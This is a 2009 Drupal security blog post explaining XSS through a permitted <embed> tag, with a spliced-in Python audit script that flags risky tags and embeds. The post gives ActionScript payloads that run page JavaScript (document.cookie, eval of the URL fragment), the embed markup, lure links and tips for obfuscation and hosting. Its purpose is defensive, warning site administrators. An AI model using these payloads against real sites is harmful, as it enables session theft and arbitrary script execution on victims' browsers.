Using <embed> for XSS

Heine —Fri, 2009/10/30 - 18:38

I see a lot fewer stray <script> tags in the "Allowed HTML tags:" of the HTML filter these days. The <embed> tag is something I still see a lot in misconfigured formats.

It's rather easy to exploit such formats to execute JavaScript with a little bit of ActionScript:

class Main
{
  static function main(){  
    getURL('javascript:alert(document.cookie)');    
  }
}

Build with an ActionScript 2 compiler (e.g. the Flex SDK), upload to a convenient location *), then make a post on the site that was so careless as to allow the <embed> tag:

<embed width="0" height="0" src="http://convenient-location.example.com/XSS.swf" AllowScriptAccess="always"></embed>

Now all you have to do is lead the victim to this URL:

<a href="http://victims-site.example.com/your_swf_post">Spam on the forum</a>

If you can't be bothered to change your swf file all the time, you can attempt to create a generic XSS attack that fetches JS from the URL fragment:

class Main
{
  static function main(){  
    getURL('javascript:eval(document.location.hash.substr(1))');    
  }
}

The victim now has to visit (use a URL shortener for maximum obfuscation):

<a href="http://victims-site.example.com/your_swf_post#alert('another boring alert')">Spam on the forum</a>

That's it folks. Moral of the story: don't allow <embed> use in the HTML filter. If you need to embed videos, employ one of the modules that insert videos from trusted sources and prevent script interaction.
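To make the moral actionable on the defending side, here is an added audit script (example code, not part of the original post or of any Drupal module). It does two things: it checks an "Allowed HTML tags" setting for tags that permit script execution or plugin loading, and it scans stored post bodies for <embed>/<object> tags that load a .swf or carry AllowScriptAccess="always", so existing content can be found and cleaned. The DANGEROUS_TAGS list and the sample settings string and post body are constructed for the example.

```python
from html.parser import HTMLParser

# Tags that let a posting run script or load plugin content.
# This set is an assumption for the example, not a Drupal default.
DANGEROUS_TAGS = {"script", "embed", "object", "iframe"}


def audit_allowed_tags(allowed):
    """Return the dangerous tags present in an 'Allowed HTML tags' setting.

    `allowed` is the string as entered in the filter settings,
    e.g. '<a> <em> <strong> <embed>'.
    """
    tags = {t.strip("<>").lower() for t in allowed.split()}
    return sorted(tags & DANGEROUS_TAGS)


class EmbedFinder(HTMLParser):
    """Collect <embed>/<object> tags that load Flash content or
    explicitly allow the plugin to call into the page's JavaScript."""

    def __init__(self):
        super().__init__()
        self.findings = []

    # HTMLParser lowercases tag and attribute names for us.
    def handle_starttag(self, tag, attrs):
        if tag not in ("embed", "object"):
            return
        a = {name: (value or "") for name, value in attrs}
        reasons = []
        if a.get("allowscriptaccess", "").lower() == "always":
            reasons.append("AllowScriptAccess=always")
        src = a.get("src") or a.get("data") or ""
        if src.lower().split("?", 1)[0].endswith(".swf"):
            reasons.append("loads .swf: " + src)
        if reasons:
            self.findings.append((tag, reasons))


def find_risky_embeds(html):
    """Return [(tag, [reason, ...]), ...] for risky embeds in a post body."""
    parser = EmbedFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    # Constructed sample: a misconfigured filter and a post using the
    # embed from the article (example.com host, as on the page).
    settings = "<a> <em> <strong> <cite> <embed>"
    post = (
        '<p>Spam on the forum</p>'
        '<embed width="0" height="0" '
        'src="http://convenient-location.example.com/XSS.swf" '
        'AllowScriptAccess="always"></embed>'
    )
    print("dangerous allowed tags:", audit_allowed_tags(settings))
    for tag, reasons in find_risky_embeds(post):
        print("risky <%s>: %s" % (tag, "; ".join(reasons)))
```

Run it against each input format's "Allowed HTML tags" string and against node and comment bodies already in the database; anything it reports should either be removed or replaced by a video-embedding module that only accepts URLs from trusted hosts.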

*) Bonus points if you upload the swf to another misconfigured Drupal site! Hint:

"Only files with the following extensions may be uploaded" swf
  • Drupal
  • Security
  • Planet Drupal
  • Input Format

Comments

Submitted by dalin (not verified) on Sun, 2009/11/01 - 13:27

Thanks Heine, I've often tried to find the details of why embed was dangerous but could never find it.

Copyright © 2016 by Heine Deelstra. All rights reserved.